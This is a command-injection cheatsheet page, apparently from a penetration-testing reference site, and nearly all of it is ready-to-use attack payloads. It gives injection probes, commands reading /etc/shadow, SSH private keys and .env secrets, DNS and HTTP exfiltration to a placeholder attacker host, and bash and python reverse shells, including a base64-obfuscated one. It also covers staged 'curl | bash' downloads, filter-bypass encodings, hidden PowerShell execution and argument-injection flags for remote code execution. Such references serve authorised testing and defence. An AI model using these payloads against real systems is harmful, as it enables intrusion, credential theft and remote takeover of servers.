Skip to content
Codex Codex

Cheatsheet

T1190 Exploit Public-Facing Application T1059 Command and Scripting Interpreter A05:2025 Injection RCE

Separators

Section titled “Separators”
SepURL-encBoth run?OutputNotes
;%3bYesBothFails on cmd.exe
\n%0aYesBothMost reliable; rarely filtered
&%26YesBothBackground on Linux; sequential on Windows
|%7cYesInjected only
&&%26%26If first succeedsBoth
||%7c%7cIf first failsInjected only
` `%60%60SubstitutionLinux/macOS only
$()%24%28%29SubstitutionLinux/macOS only

Detection probes

Section titled “Detection probes”
<original>;id
<original>%0aid
<original>|id
<original>&&id
<original>`id`
<original>$(id)

Success: uid= in response body, or response time delta if blind.

Execution

Section titled “Execution”
Terminal window
# Identity & environment
id; whoami; hostname; uname -a; pwd; env


# Files
cat /etc/passwd
cat /etc/shadow
cat /var/www/html/.env
cat ~/.ssh/id_rsa
cat /proc/self/environ


# Network & privesc
ip a; ss -tlnp 2>/dev/null
sudo -n -l
find / -perm -4000 -type f 2>/dev/null
find / -writable -type d 2>/dev/null


# Cloud metadata
curl -s --max-time 2 http://169.254.169.254/latest/meta-data/


# Output capture patterns
;id 2>&1                                # merge stderr
;id > /tmp/.r 2>&1; cat /tmp/.r         # write-then-read

Blind & OOB

Section titled “Blind & OOB”
Terminal window
# Time-based
;sleep 10
;ping -c 10 127.0.0.1


# DNS exfil (Burp Collaborator / interactsh)
;nslookup <ATTACKER>
;nslookup $(whoami).<ATTACKER>
;nslookup $(id|base64 -w0|tr -d '=').<ATTACKER>


# HTTP exfil
;curl <ATTACKER>/$(whoami)
;curl <ATTACKER>/$(id|base64 -w0)
;curl -X POST <ATTACKER> -d "$(cat /etc/passwd)"


# No curl/wget
;exec 3<>/dev/tcp/<ATTACKER>/80; echo -e "GET /$(whoami) HTTP/1.0\r\n\r\n" >&3

Reverse shells

Section titled “Reverse shells”
Terminal window
# Listener
nc -lvnp <LPORT>


# bash TCP
;bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'


# Filter-resistant (brace expansion + base64)
;{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC88TEhPU1Q+LzxMUE9SVD4gMD4mMQ==}|{base64,-d}|{bash,-i}


# python (no /dev/tcp)
;python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("<LHOST>",<LPORT>));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/sh")'


# Stage from your server
;curl <ATTACKER>/r.sh|bash


# TTY upgrade (after callback)
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z, then locally: stty raw -echo; fg ; export TERM=xterm-256color

Filter bypasses

Section titled “Filter bypasses”

Spaces

Section titled “Spaces”
Terminal window
{cat,/etc/passwd}                       # brace expansion
cat${IFS}/etc/passwd                    # IFS variable
cat%09/etc/passwd                       # tab

Slashes

Section titled “Slashes”
Terminal window
${PATH:0:1}                             # = "/"
${HOME:0:1}                             # = "/"
%HOMEPATH:~6,-11%                       # cmd: = "\"
$env:HOMEPATH[0]                        # PowerShell: = "\"

Command names

Section titled “Command names”
Terminal window
w'h'o'am'i                              # quote insertion (Linux/Win)
w"h"o"am"i
who$@ami                                # positional param (Linux)
w\h\o\am\i                              # backslash (Linux)
who^ami                                 # caret (Windows cmd)
$(rev<<<imaohw)                         # reversal (Linux)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")        # case conversion

Wholesale

Section titled “Wholesale”
Terminal window
# Linux base64 wrapper
;bash<<<$(base64 -d<<<<base64-payload>)


# Windows encoded command
;powershell -nop -w hidden -enc <BASE64-UTF16LE>

Stacked example

Section titled “Stacked example”

Filtered: spaces, ;, cat, /. Newline allowed.

%0a${LS_COLORS:10:1}c'a't${IFS}${PATH:0:1}etc${PATH:0:1}passwd

Argument injection

Section titled “Argument injection”
BinaryFlagEffect
curl-o <FILE> <URL>Write file
curl-K <FILE>Read file (config parser)
curl--upload-file <FILE> <URL>Exfil file
wget-O <FILE> <URL>Write file
ssh-o ProxyCommand="<CMD>" anyhostRCE
tar--checkpoint=1 --checkpoint-action=exec=<CMD>RCE
find-exec <CMD> \;RCE
gitclone --upload-pack="<CMD>" 'ssh://x/x'RCE (CVE-2017-1000117 family)
psql-c '\! <CMD>'RCE via shell escape

Detect by sending value starting with - (e.g., --help, --version). Response change = argv reached.

Encoding helpers

Section titled “Encoding helpers”
Terminal window
# base64 for Linux bash<<< wrapper
echo -n '<command>' | base64 -w0


# base64 for PowerShell -enc (UTF-16LE!)
echo -n '<command>' | iconv -t UTF-16LE | base64 -w0


# URL encode in shell
python3 -c "import urllib.parse;print(urllib.parse.quote('<payload>'))"

OOB listeners

Section titled “OOB listeners”
Terminal window
# Burp Collaborator: built into Burp Pro
# interactsh
interactsh-client                       # public server, prints hostname


# Self-hosted (your VPS)
sudo tcpdump -i any -n udp port 53      # DNS
python3 -m http.server 80               # HTTP
nc -lvnp 80                             # raw HTTP

Quick decision tree

Section titled “Quick decision tree”
  1. Output reflected? → use ; or \n, run id
  2. Output suppressed? → use ;sleep 10 to confirm, then OOB via curl/nslookup
  3. “Invalid input” error? → reduce by one char to find filter, apply matching bypass
  4. Binary takes user value as arg without shell? → try --help, then exploit-flags table above
  5. Got RCE, need shell? → bash /dev/tcp or PowerShell TCPClient, base64-wrap if filtered
Defenses D3-MH Message Hardening D3-PSA Process Spawn Analysis